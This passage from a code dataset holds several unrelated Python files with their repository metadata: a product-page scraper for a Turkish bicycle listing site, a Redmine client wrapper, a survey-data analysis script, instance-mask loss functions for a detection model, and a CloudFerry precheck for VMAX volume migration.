Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-bodrum-26-man.html'}, {'name': 'Bianchi Energy D Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-energy-d-24.html'}, {'name': 'Ümit 2657 Albatros V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2657-albatros-v.html'}, {'name': 'Ümit 2012 Ben10 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2012-ben10.html'}, {'name': 'Ümit 2002 Z-Trend Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2002-z-trend.html'}, {'name': 'Mosso 29 WildFire LTD V Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-29-wildfire-ltd-v.html'}, {'name': 'Salcano 300 20 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-300-20-md.html'}, {'name': 'Salcano City Wind Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-wind-lady-hd.html'}, {'name': 'Salcano NG444 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng444-27-5-hd.html'}, {'name': 'Carraro Daytona 927 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-daytona-927.html'}, {'name': 'Kron FD2100 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-fd2100.html'}, {'name': 'Kron WRC1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-wrc1000.html'}, {'name': 'Vortex 5.0 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/vortex-5-0-27-5.html'}, {'name': 'Kron XC75L 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc75l-20.html'}, {'name': 'Kron Vortex 4.0 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-vortex-4-0-26-v.html'}, {'name': 'Kron Anthea 3.0 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-anthea-3-0-20.html'}, {'name': 'Peugeot T16-28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-t16-28.html'}, {'name': 'Peugeot M15-26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-m15-26.html'}, {'name': 'Daafu SXC 100 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/daafu-sxc-100-20.html'}, {'name': 'Corelli Kickboy 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-kickboy-20.html'}, {'name': 'Peugeot F13 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-f13.html'}, {'name': 'Carraro Elite 805 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-elite-805.html'}, {'name': 'Carraro Force 920 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-force-920.html'}, {'name': 'Berg Jeep Adventure Bisiklet', 'link': 'https://www.epey.com/bisiklet/berg-jeep-adventure.html'}, {'name': 'Berg Buddy Orange Bisiklet', 'link': 'https://www.epey.com/bisiklet/berg-buddy-orange.html'}, {'name': 'Ümit 2019 Picolo Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2019-picolo.html'}, {'name': 'Ümit 2833 Ventura Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2833-ventura-lady.html'}, {'name': 'Ümit 2668 Faster V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2668-faster-v.html'}, {'name': 'Ümit 2960 Camaro HYD Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2960-camaro-hyd.html'}, {'name': 'Kron RF100 24 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-rf100-24-v.html'}, {'name': 'Sedona 240 Bisiklet', 'link': 'https://www.epey.com/bisiklet/sedona-240.html'}, {'name': 'Corelli Carmen 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-carmen-1-0.html'}, {'name': 'Corelli Swing 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-swing-2-0.html'}, {'name': 'Corelli Teton 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-teton-2-2.html'}, {'name': 'Bianchi Buffalo 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-buffalo-24.html'}, {'name': 'Carraro Juliana 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-juliana-26.html'}, {'name': 'Ghost Kato 5.7 AL Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-5-7-al.html'}, {'name': 'Bianchi Intenso Potenza Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-intenso-potenza.html'}, {'name': 'Salcano İmpetus 29 Deore Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-impetus-29-deore.html'}, {'name': 'Salcano NG400 27.5 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng400-27-5-lady-hd.html'}, {'name': 'Salcano NG750 26 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng750-26-lady-hd.html'}, {'name': 'Salcano NG800 24 Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng800-24-lady-v.html'}, {'name': 'Salcano Lion FS Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-lion-fs.html'}, {'name': 'Salcano City Fun 50 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-fun-50-lady-hd.html'}, {'name': 'Salcano Marmaris Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-marmaris.html'}, {'name': 'Salcano NG 800 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng-800-26-v.html'}, {'name': 'Corelli Terra 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-terra-1-0.html'}, {'name': 'Corelli Adonis 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-adonis-2-2.html'}, {'name': 'Corelli Jazz 1.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-jazz-1-2.html'}, {'name': 'Corelli Cyborg 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-cyborg-2-0.html'}, {'name': 'Corelli Scopri 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-scopri-2-0.html'}, {'name': 'Orbis Punkrose 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-punkrose-24.html'}, {'name': 'Orbis Tweety 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-tweety-16.html'}, {'name': 'Orbis Crazy 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-crazy-20.html'}, {'name': 'Orbis Cloud 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-cloud-20.html'}, {'name': 'Orbis Dynamic 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-dynamic-24.html'}, {'name': 'Orbis Escape 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-escape-24.html'}, {'name': 'Tern Verge S27H Bisiklet', 'link': 'https://www.epey.com/bisiklet/tern-verge-s27h.html'}, {'name': 'Dahon Briza D8 Bisiklet', 'link': 'https://www.epey.com/bisiklet/dahon-briza-d8.html'}, {'name': 'Kron XC100 24 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc100-24-man-v.html'}, {'name': 'Kron TX150L Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-tx150-lady-v.html'}, {'name': 'Kron XC450 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc450-27-5-man-hd.html'}, {'name': 'Whistle Guipago 1830 Bisiklet', 'link': 'https://www.epey.com/bisiklet/whistle-guipago-1830.html'}, {'name': 'Mosso 20 WildFire V Boys Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-20-wildfire-v-boys.html'}, {'name': 'Mosso City Life Nexus Man Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-city-life-nexus-man.html'}, {'name': 'Mosso 771TB3 DMD Acera Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-771tb3-dmd-acera.html'}, {'name': 'Mosso 735TCA 105 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-735tca-105.html'}, {'name': 'Mosso Groovy 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-groovy-27-5.html'}, {'name': 'Ghost Kato 4 Kid 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-4-kid-24.html'}, {'name': 'Ghost Kato 2 Kid 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-2-kid-20.html'}, {'name': 'Ghost Lawu 2 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-lawu-2-26.html'}, {'name': 'Carraro Daytona 2924 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-daytona-2924.html'}, {'name': 'Carraro Flexi 103 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-flexi-103.html'}, {'name': 'Carraro Süngerbob 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-sungerbob-20.html'}, {'name': 'Bianchi Bella 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-bella-24.html'}, {'name': 'Bianchi RCX 237 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-rcx-237.html'}, {'name': 'Bianchi Touring 411 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-touring-411.html'}, {'name': 'Salcano Sarajevo 26 Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-sarajevo-26-lady.html'}, {'name': 'Salcano NG450 26 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng450-26-lady-hd.html'}, {'name': 'Salcano City Sport 40 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-sport-40-v.html'}, {'name': 'Ümit 2049 Monster High Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2049-monster-high.html'}, {'name': 'Cube Reaction GTC Race 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-reaction-gtc-race-27-5.html'}, {'name': 'Arbike 2901 Bisiklet', 'link': 'https://www.epey.com/bisiklet/arbike-2901.html'}, {'name': 'Arbike 2606 26 inç Bisiklet', 'link': 'https://www.epey.com/bisiklet/arbike-2606.html'}, {'name': 'Salcano NG350 29 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng350-hd-29.html'}, {'name': 'Salcano NG750 24 Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng750-lady-24.html'}, {'name': 'Cube Delhi Pro Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-delhi-pro.html'}, {'name': 'Cube Attain Race Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-attain-race.html'}, {'name': 'Cube Attain GTC SL Disk Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-attain-gtc-sl-disk.html'}, {'name': 'Cube Acid 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-acid-27-5.html'}, {'name': 'Cube Agree C:62 SL Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-agree-c62-sl.html'}, {'name': 'Merida BIG.NINE XT Edition 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/merida-big-nine-xt-edition-29.html'}, {'name': 'Merida BIG.SEVEN 1000 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/merida-big-seven-1000-27-5.html'}, {'name': 'Trek Superfly 5 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/trek-superfly-5-29.html'}, {'name': 'Geotech Manic Carbon 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/geotech-manic-carbon-29.html'}, {'name': 'Corratec Superbow Fun 29ER 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corratec-superbow-fun-29er-29.html'}, {'name': 'Corratec Dolomiti Sora 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corratec-dolomiti-sora-28.html'}, {'name': 'Cannondale Supersix Evo Ultegra Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-supersix-evo-ultegra-4-28.html'}, {'name': 'Cannondale Bad Boy 4 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-bad-boy-4-28.html'}, {'name': 'Cannondale Trail Womens 5 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-trail-womens-5-27-5.html'}, {'name': 'Schwinn Searcher 3 Men 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/schwinn-searcher-3-men-28.html'}, {'name': 'Geotech Path XC 4.4 20. Yil özel Seri 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/geotech-path-xc-4-4-20-yil-ozel-seri-26.html'}, {'name': 'Kron XC250 Lady 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc250-lady-26.html'}, {'name': 'Kron TX150 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-tx150-hd.html'}, {'name': 'Salcano Igman 27.5 Deore Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-igman-deore-27-5.html'}, {'name': 'Salcano Astro 29 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-astro-v-29.html'}, {'name': 'Salcano City Wings 20 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-wings-20-hd.html'}, {'name': 'Salcano XRS050 Claris Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-xrs050-claris.html'}, {'name': 'Salcano Tracker 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-tracker-20.html'}, {'name': 'Salcano Cappadocia Steel Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-cappadocia-steel.html'}, {'name': 'Salcano Assos 20 29 X1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-assos-20-x1-29.html'}, {'name': 'Salcano Assos 10 29 X1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-assos-10-x1-29.html'}, {'name': 'Scott Contessa 640 Bisiklet', 'link': 'https://www.epey.com/bisiklet/scott-contessa-640-26.html'}, {'name': 'Tern Link B7 Bisiklet', 'link': 'https://www.epey.com/bisiklet/tern-link-b7-20.html'}, {'name': 'Bianchi Honey Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-honey-16.html'}, {'name': 'Bianchi Touring 405 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-touring-405-bayan-28.html'}, {'name': 'Bianchi AFX 7029 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-afx-7029-29.html'}, {'name': 'Bianchi RCX 426 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-rcx-426-26.html'}, {'name': 'Bianchi Nitro Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-nitro-24.html'}, {'name': 'Carraro Sportive 327 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-sportive-327-28.html'}, {'name': 'Carraro Street 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-street-26.html'}, {'name': 'Carraro Big 629 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-big-629-29.html'}, {'name': 'Carraro Crs 620 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-crs-620-26.html'}, {'name': 'Sedona Black Code 8 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/sedona-black-code-8-27-5.html'}, {'name': 'Coranna 2491 Castor Bisiklet', 'link': 'https://www.epey.com/bisiklet/coranna-2491-castor.html'}, {'name': "Ümit 2842 City's Bisiklet", 'link': 'https://www.epey.com/bisiklet/umit-2842-citys-2842-citys.html'}, {'name': 'Ümit 2411 Rideon Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2411-rideon.html'}, {'name': 'Ümit 2056 Accrue 2D 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2056-accrue-2d-20.html'}, {'name': 'Ümit 1671 Superbomber 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-1671-superbomber-16.html'}, {'name': 'Ümit 2802 Taurus Man 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2802-taurus-man-28.html'}, {'name': 'Ümit 2053 Thunder 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2053-thunder-20.html'}, {'name': 'Ümit 2965 Mirage V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2965-mirage-v.html'}, {'name': 'Gitane Fast Bisiklet', 'link': 'https://www.epey.com/bisiklet/gitane-fast.html'}, {'name': 'Carraro Kifuka 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-kifuka-27-5.html'}] for i in bicycles: url = i['link'] try: req = Request(url, headers={'User-Agent': 'Mozilla/5.0'}) webpage = urlopen(req).read() except: print("err in "+i['link']) else: print("Downloaded "+i['name']+" ", end="\r") fileName = i['name'].replace('/','_') f = open("./listItems/"+fileName+'.html', 'wb') f.write(webpage) f.close
[((12, 14, 12, 65), 'urllib.request.Request', 'Request', (), '', False, 'from urllib.request import Request, urlopen\n'), ((13, 18, 13, 30), 'urllib.request.urlopen', 'urlopen', ({(13, 26, 13, 29): 'req'}, {}), '(req)', False, 'from urllib.request import Request, urlopen\n')]
hugoseabra/redmine-task-generator
redmine/__init__.py
b5ce1764f1c7588a7c82b25f7dd4bf07d1c105cf
from django.conf import settings from redminelib import Redmine as DefaultRedmine from .validator import RedmineInstanceValidator class Redmine(DefaultRedmine): def __init__(self, url=None, key=None): url = url or settings.REDMINE_BASE_URL key = key or settings.REDMINE_API_KEY super().__init__(url=url, key=key) self.validator = RedmineInstanceValidator(client=self) @property def score_field(self): return self.validator.score_field def instance_errors(self): errors = list() if self.validator.track_errors: errors += self.validator.track_errors if self.validator.score_field_errors: errors += self.validator.score_field_errors return errors def instance_valid(self) -> bool: return self.validator.instance_valid() def project_valid(self, project_id) -> bool: return self.validator.project_valid(project_id)
[]
trenton3983/PyCharmProjects
python_survey/finished_files/main.py
fae8653a25e07e7384eb0ddf6ea191adeb44face
import pandas as pd import numpy as np import matplotlib.pyplot as plt import scipy.stats from finished_files.survey_data_dictionary import DATA_DICTIONARY # Load data # We want to take the names list from our data dictionary names = [x.name for x in DATA_DICTIONARY] # Generate the list of names to import usecols = [x.name for x in DATA_DICTIONARY if x.usecol] # dtypes should be a dict of 'col_name' : dtype dtypes = {x.name : x.dtype for x in DATA_DICTIONARY if x.dtype} # same for converters converters = {x.name : x.converter for x in DATA_DICTIONARY if x.converter} df = pd.read_csv('data/survey.csv', header=0, names=names, dtype=dtypes, converters=converters, usecols=usecols) #%% Clean up data: remove disqualified users # In the survey, any user who selected they don't use Python was then # disqualified from the rest of the survey. So let's drop them here. df = df[df['python_main'] != 'No, I don’t use Python for my current projects'] # Considering we now only have two categories left: # - Yes # - No, I use Python for secondary projects only # Let's turn it into a bool df['python_main'] = df['python_main'] == 'Yes' #%% Plot the web dev / data scientist ratio # In the survey, respondents were asked to estimate the ratio between # the amount of web developers vs the amount of data scientists. Afterwards # they were asked what they thought the most popular answer would be. # Let's see if there's a difference! # This is a categorical data point, and it's already ordered in the data # dictionary. So we shouldn't sort it after counting the values. ratio_self = df['webdev_science_ratio_self'].value_counts(sort=False) ratio_others = df['webdev_science_ratio_others'].value_counts(sort=False) # Let's draw a bar chart comparing the distributions fig = plt.figure() ax = fig.add_subplot(111) RATIO_COUNT = ratio_self.count() x = np.arange(RATIO_COUNT) WIDTH = 0.4 self_bars = ax.bar(x-WIDTH, ratio_self, width=WIDTH, color='b', align='center') others_bars = ax.bar(x, ratio_others, width=WIDTH, color='g', align='center') ax.set_xlabel('Ratios') ax.set_ylabel('Observations') labels = [str(lbl) for lbl in ratio_self.index] ax.set_xticks(x - 0.5 * WIDTH) ax.set_xticklabels(labels) ax.legend((self_bars[0], others_bars[0]), ('Self', 'Most popular')) plt.show() #%% Calculate the predicted totals # Let's recode the ratios to numbers, and calculate the means CONVERSION = { '10:1': 10, '5:1' : 5, '2:1' : 2, '1:1' : 1, '1:2' : 0.5, '1:5' : 0.2, '1:10': 0.1 } self_numeric = df['webdev_science_ratio_self'] \ .replace(CONVERSION.keys(), CONVERSION.values()) others_numeric = df['webdev_science_ratio_others'] \ .replace(CONVERSION.keys(), CONVERSION.values()) print(f'Self:\t\t{self_numeric.mean().round(2)} web devs / scientist') print(f'Others:\t\t{others_numeric.mean().round(2)} web devs / scientist') #%% Is the difference statistically significant? result = scipy.stats.chisquare(ratio_self, ratio_others) # The null hypothesis is that they're the same. Let's see if we can reject it print(result)
[((22, 5, 27, 33), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((55, 6, 55, 18), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((59, 4, 59, 26), 'numpy.arange', 'np.arange', ({(59, 14, 59, 25): 'RATIO_COUNT'}, {}), '(RATIO_COUNT)', True, 'import numpy as np\n'), ((73, 0, 73, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n')]
yinghdb/AdelaiDet
adet/modeling/embedmask/mask_pred.py
94a9b7cde92fb039852f876964d991a1f3e15af4
import torch from torch.nn import functional as F from torch import nn from torch.autograd import Variable from adet.utils.comm import compute_locations, aligned_bilinear def dice_coefficient(x, target): eps = 1e-5 n_inst = x.size(0) x = x.reshape(n_inst, -1) target = target.reshape(n_inst, -1) intersection = (x * target).sum(dim=1) union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps loss = 1. - (2 * intersection / union) return loss def lovasz_grad(gt_sorted): """ Computes gradient of the Lovasz extension w.r.t sorted errors See Alg. 1 in paper """ p = len(gt_sorted) gts = gt_sorted.sum() intersection = gts - gt_sorted.float().cumsum(0) union = gts + (1 - gt_sorted.float()).cumsum(0) jaccard = 1. - intersection / union if p > 1: # cover 1-pixel case jaccard[1:p] = jaccard[1:p] - jaccard[0:-1] return jaccard def lovasz_hinge(logits, labels): """ Binary Lovasz hinge loss logits: [P] Variable, logits at each prediction (between -\infty and +\infty) labels: [P] Tensor, binary ground truth labels (0 or 1) """ if len(labels) == 0: # only void pixels, the gradients should be 0 return logits.sum() * 0. signs = 2. * labels.float() - 1. errors = (1. - logits * Variable(signs)) errors_sorted, perm = torch.sort(errors, dim=0, descending=True) perm = perm.data gt_sorted = labels[perm] grad = lovasz_grad(gt_sorted) loss = torch.dot(F.relu(errors_sorted), Variable(grad)) return loss def lovasz_loss(x, target): eps = 1e-6 n_inst = x.size(0) x = x.reshape(n_inst, -1) target = target.reshape(n_inst, -1) x = torch.clamp(x, min=eps, max=1-eps) x = torch.log(x) - torch.log(1 - x) losses = [] for i in range(n_inst): losses.append(lovasz_hinge(x[i], target[i])) loss = torch.stack(losses) return loss def build_mask_pred(cfg): return MaskPred(cfg) class MaskPred(nn.Module): def __init__(self, cfg): super(MaskPred, self).__init__() self.in_channels = cfg.MODEL.EMBEDMASK.MASK_BRANCH.OUT_CHANNELS self.mask_out_stride = cfg.MODEL.EMBEDMASK.MASK_OUT_STRIDE soi = cfg.MODEL.FCOS.SIZES_OF_INTEREST self.register_buffer("sizes_of_interest", torch.tensor(soi + [soi[-1] * 2])) self.register_buffer("_iter", torch.zeros([1])) self.mask_loss_type = cfg.MODEL.EMBEDMASK.MASK_LOSS_TYPE self.mask_loss_alpha = cfg.MODEL.EMBEDMASK.MASK_LOSS_ALPHA def __call__(self, pixel_embed, mask_feat_stride, pred_instances, gt_instances=None): if self.training: self._iter += 1 gt_inds = pred_instances.gt_inds gt_bitmasks = torch.cat([per_im.gt_bitmasks for per_im in gt_instances]) gt_bitmasks = gt_bitmasks[gt_inds].unsqueeze(dim=1).to(dtype=pixel_embed.dtype) losses = {} if len(pred_instances) == 0: dummy_loss = pixel_embed.sum() * 0 + pred_instances.proposal_embed.sum() * 0 + pred_instances.proposal_margin.sum() * 0 losses["loss_mask"] = dummy_loss else: mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride) if self.mask_loss_type == "Dice": mask_losses = dice_coefficient(mask_prob, gt_bitmasks) loss_mask = mask_losses.mean() elif self.mask_loss_type == "Lovasz": mask_losses = lovasz_loss(mask_prob, gt_bitmasks) loss_mask = mask_losses.mean() losses["loss_mask"] = loss_mask * self.mask_loss_alpha return losses else: if len(pred_instances) > 0: mask_prob = self.compute_mask_prob(pred_instances, pixel_embed, mask_feat_stride) pred_instances.pred_global_masks = mask_prob return pred_instances def compute_mask_prob(self, instances, pixel_embed, mask_feat_stride): proposal_embed = instances.proposal_embed proposal_margin = instances.proposal_margin im_inds = instances.im_inds dim, m_h, m_w = pixel_embed.shape[-3:] obj_num = proposal_embed.shape[0] pixel_embed = pixel_embed.permute(0, 2, 3, 1)[im_inds] proposal_embed = proposal_embed.view(obj_num, 1, 1, -1).expand(-1, m_h, m_w, -1) proposal_margin = proposal_margin.view(obj_num, 1, 1, dim).expand(-1, m_h, m_w, -1) mask_var = (pixel_embed - proposal_embed) ** 2 mask_prob = torch.exp(-torch.sum(mask_var * proposal_margin, dim=3)) assert mask_feat_stride >= self.mask_out_stride assert mask_feat_stride % self.mask_out_stride == 0 mask_prob = aligned_bilinear(mask_prob.unsqueeze(1), int(mask_feat_stride / self.mask_out_stride)) return mask_prob
[((43, 26, 43, 68), 'torch.sort', 'torch.sort', (), '', False, 'import torch\n'), ((56, 8, 56, 42), 'torch.clamp', 'torch.clamp', (), '', False, 'import torch\n'), ((62, 11, 62, 30), 'torch.stack', 'torch.stack', ({(62, 23, 62, 29): 'losses'}, {}), '(losses)', False, 'import torch\n'), ((47, 21, 47, 42), 'torch.nn.functional.relu', 'F.relu', ({(47, 28, 47, 41): 'errors_sorted'}, {}), '(errors_sorted)', True, 'from torch.nn import functional as F\n'), ((47, 44, 47, 58), 'torch.autograd.Variable', 'Variable', ({(47, 53, 47, 57): 'grad'}, {}), '(grad)', False, 'from torch.autograd import Variable\n'), ((57, 8, 57, 20), 'torch.log', 'torch.log', ({(57, 18, 57, 19): 'x'}, {}), '(x)', False, 'import torch\n'), ((57, 23, 57, 39), 'torch.log', 'torch.log', ({(57, 33, 57, 38): '(1 - x)'}, {}), '(1 - x)', False, 'import torch\n'), ((42, 28, 42, 43), 'torch.autograd.Variable', 'Variable', ({(42, 37, 42, 42): 'signs'}, {}), '(signs)', False, 'from torch.autograd import Variable\n'), ((77, 50, 77, 83), 'torch.tensor', 'torch.tensor', ({(77, 63, 77, 82): '(soi + [soi[-1] * 2])'}, {}), '(soi + [soi[-1] * 2])', False, 'import torch\n'), ((79, 38, 79, 54), 'torch.zeros', 'torch.zeros', ({(79, 50, 79, 53): '[1]'}, {}), '([1])', False, 'import torch\n'), ((89, 26, 89, 84), 'torch.cat', 'torch.cat', ({(89, 36, 89, 83): '[per_im.gt_bitmasks for per_im in gt_instances]'}, {}), '([per_im.gt_bitmasks for per_im in gt_instances])', False, 'import torch\n'), ((128, 31, 128, 75), 'torch.sum', 'torch.sum', (), '', False, 'import torch\n')]
SVilgelm/CloudFerry
cloudferry/actions/prechecks/check_vmax_prerequisites.py
4459c0d21ba7ccffe51176932197b352e426ba63
# Copyright 2016 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import getpass import logging from cloudferry.lib.base import exception from cloudferry.lib.base.action import action from cloudferry.lib.utils import local from cloudferry.lib.utils import remote_runner LOG = logging.getLogger(__name__) class CheckVMAXPrerequisites(action.Action): """This verifies prerequisites required for NFS to VMAX iSCSI cinder volume migration""" def _iscsiadm_is_installed_locally(self): LOG.info("Checking if iscsiadm tool is installed") try: local.run('iscsiadm --help &>/dev/null') except local.LocalExecutionFailed: msg = ("iscsiadm is not available on the local host. Please " "install iscsiadm tool on the node you running on or " "choose other cinder backend for migration. iscsiadm is " "mandatory for migrations with EMC VMAX cinder backend") LOG.error(msg) raise exception.AbortMigrationError(msg) def _check_local_sudo_password_set(self): current_user = getpass.getuser() if current_user != 'root' and \ self.cfg.migrate.local_sudo_password is None: try: local.sudo('ls') except local.LocalExecutionFailed: msg = ("CloudFerry is running as '{user}' user, but " "passwordless sudo does not seem to be configured on " "current host. Please either specify password in " "`local_sudo_password` config option, or run " "CloudFerry as root user.").format(user=current_user) LOG.error(msg) raise exception.AbortMigrationError(msg) def _ssh_connectivity_between_controllers(self): src_host = self.cfg.src.ssh_host src_user = self.cfg.src.ssh_user dst_host = self.cfg.dst.ssh_host dst_user = self.cfg.dst.ssh_user LOG.info("Checking ssh connectivity between '%s' and '%s'", src_host, dst_host) rr = remote_runner.RemoteRunner(src_host, src_user) ssh_opts = ('-o UserKnownHostsFile=/dev/null ' '-o StrictHostKeyChecking=no') cmd = "ssh {opts} {user}@{host} 'echo ok'".format(opts=ssh_opts, user=dst_user, host=dst_host) try: rr.run(cmd) except remote_runner.RemoteExecutionError: msg = ("No ssh connectivity between source host '{src_host}' and " "destination host '{dst_host}'. Make sure you have keys " "and correct configuration on these nodes. To verify run " "'{ssh_cmd}' from '{src_host}' node") msg = msg.format(src_host=src_host, dst_host=dst_host, ssh_cmd=cmd) LOG.error(msg) raise exception.AbortMigrationError(msg) def run(self, **kwargs): if self.cfg.dst_storage.backend != 'iscsi-vmax': return self._iscsiadm_is_installed_locally() self._ssh_connectivity_between_controllers() self._check_local_sudo_password_set()
